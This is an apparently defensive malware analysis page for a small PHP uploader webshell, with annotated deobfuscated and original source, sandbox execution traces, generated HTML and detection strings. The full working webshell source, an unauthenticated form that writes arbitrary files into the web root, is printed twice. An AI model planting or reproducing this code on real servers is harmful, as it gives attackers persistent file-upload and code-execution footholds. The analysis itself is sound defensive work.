PHP Malware Analysis

Observed file names: op.php, sc.pHP5, sc.pjpg

md5: 8406b59c6e95f14a9570ae4772dbcc29


Deobfuscated PHP code


<?php 
// --- Analyst annotations. The comments in this listing are reviewer notes, not part
// of the sample (the md5 above refers to the unannotated file). ---
//
// Minimal "uploader" webshell: fingerprints the host, then lets any unauthenticated
// POST write a client-named file into the web root (or the current directory).
// There is no password, token, session or referer check anywhere in the script.
//
// Static indicators: php_uname() echoed into <pre>, a multipart form with fields
// 'file' and 'upload', and the literal strings "Sukses ~>" and
// "Gagal Upload Di Document Root." are a usable signature for this family.

// Host fingerprint: the kernel/OS string is echoed to every visitor. The traces
// below show this call returning the host string even when no file was submitted.
echo "<pre><font size='4' color='black'>" . php_uname() . "</font></pre>";
// Upload form. The "\r" sequences appear to be the deobfuscator's rendering of the
// line breaks in the original multi-line string (compare the "Original PHP code").
echo "<form method='post' enctype='multipart/form-data'>\r      <input type='file' name='file'>\r      <input type='submit' name='upload' value='Upload'>\r      </form>";
// These three assignments run on every request, before the isset() check, which is
// why every trace records $root, $files (= NULL) and $dest even with no upload.
$root = $_SERVER['DOCUMENT_ROOT'];
// Destination name is the client-supplied original filename, used verbatim: no
// extension allow-list, no rename, no content check. (PHP's multipart parser
// normally strips directory components from this value — confirm on the target
// PHP version before assuming traversal is, or is not, possible.)
$files = $_FILES['file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        // Primary target: the document root. '@' suppresses copy() warnings, so a
        // failed write leaves no PHP warning in the server error log.
        if (@copy($_FILES['file']['tmp_name'], $dest)) {
            // Echoes a clickable link to the dropped file. $web already ends in '/',
            // so the rendered URL contains "host//name". Output is not HTML-escaped.
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses ~> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>"; // "Success ~>" (Indonesian/Malay)
        } else {
            echo "Gagal Upload Di Document Root."; // "Failed to upload to document root."
        }
    } else {
        // Fallback when the document root is not writable: copy to a relative path,
        // resolved against the PHP process's current working directory (usually, but
        // not necessarily, the directory holding this script).
        if (@copy($_FILES['file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini"; // "Upload succeeded ... in this folder"
        } else {
            echo "Gagal"; // "Failed"
        }
    }
}
?>
	</body>

Execution traces (Xdebug-style function traces from the sandbox runs; in all three, $files is NULL and neither is_writable() nor copy() is recorded, so the upload branch was never exercised)

data/traces/8406b59c6e95f14a9570ae4772dbcc29_trace-1676241747.8661.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:42:53.763950]
1	0	1	0.000310	393464
1	3	0	0.000394	398824	{main}	1		/var/www/html/uploads/op.php	0	0
2	4	0	0.000413	398824	php_uname	0		/var/www/html/uploads/op.php	3	0
2	4	1	0.000429	398936
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/op.php	8	$root = '/var/www/html'
1		A						/var/www/html/uploads/op.php	9	$files = NULL
1		A						/var/www/html/uploads/op.php	10	$dest = '/var/www/html/'
1	3	1	0.000512	398864
			0.000542	314336
TRACE END   [2023-02-12 20:42:53.764225]

data/traces/8406b59c6e95f14a9570ae4772dbcc29_trace-1676254826.0586.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:20:51.956423]
1	0	1	0.000148	393512
1	3	0	0.000226	398872	{main}	1		/var/www/html/uploads/sc.pHP5	0	0
2	4	0	0.000243	398872	php_uname	0		/var/www/html/uploads/sc.pHP5	3	0
2	4	1	0.000258	398984
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/sc.pHP5	8	$root = '/var/www/html'
1		A						/var/www/html/uploads/sc.pHP5	9	$files = NULL
1		A						/var/www/html/uploads/sc.pHP5	10	$dest = '/var/www/html/'
1	3	1	0.000337	398912
			0.000363	314360
TRACE END   [2023-02-13 00:20:51.956665]

data/traces/8406b59c6e95f14a9570ae4772dbcc29_trace-1676255218.0111.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:23.908879]
1	0	1	0.000253	393512
1	3	0	0.000336	398872	{main}	1		/var/www/html/uploads/sc.pjpg	0	0
2	4	0	0.000354	398872	php_uname	0		/var/www/html/uploads/sc.pjpg	3	0
2	4	1	0.000369	398984
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/sc.pjpg	8	$root = '/var/www/html'
1		A						/var/www/html/uploads/sc.pjpg	9	$files = NULL
1		A						/var/www/html/uploads/sc.pjpg	10	$dest = '/var/www/html/'
1	3	1	0.000442	398912
			0.000469	314360
TRACE END   [2023-02-13 00:27:23.909229]


Generated HTML code

<html><head></head><body><pre><font size="4" color="black">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font></pre><form method="post" enctype="multipart/form-data">
      <input type="file" name="file">
      <input type="submit" name="upload" value="Upload">
      </form>	
</body></html>

Original PHP code


<?php
// Reviewer note: comments below are annotations, not part of the sample; the md5 at
// the top of the page refers to the unannotated file. See the "Deobfuscated PHP
// code" section for a fuller walkthrough; this is the same logic as first captured.

// Host fingerprint echoed to every visitor, before any check.
echo "<pre><font size='4' color='black'>".php_uname()."</font></pre>";
// Unauthenticated multipart upload form (fields 'file' and 'upload').
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
// Evaluated on every request (lines 8-10 in the traces), not only on upload.
$root = $_SERVER['DOCUMENT_ROOT'];
// Client-controlled filename used verbatim as the destination name; no filtering.
$files = $_FILES['file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        // Drop the file into the document root; '@' hides copy() warnings.
        if(@copy($_FILES['file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses ~> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>"; // "Success ~>"
        } else {
            echo "Gagal Upload Di Document Root."; // "Failed to upload to document root."
        }
    } else {
        // Document root not writable: fall back to a path relative to the process cwd.
        if(@copy($_FILES['file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini"; // "Upload succeeded ... in this folder"
        } else {
            echo "Gagal"; // "Failed"
        }
    }
}
?>
	</body>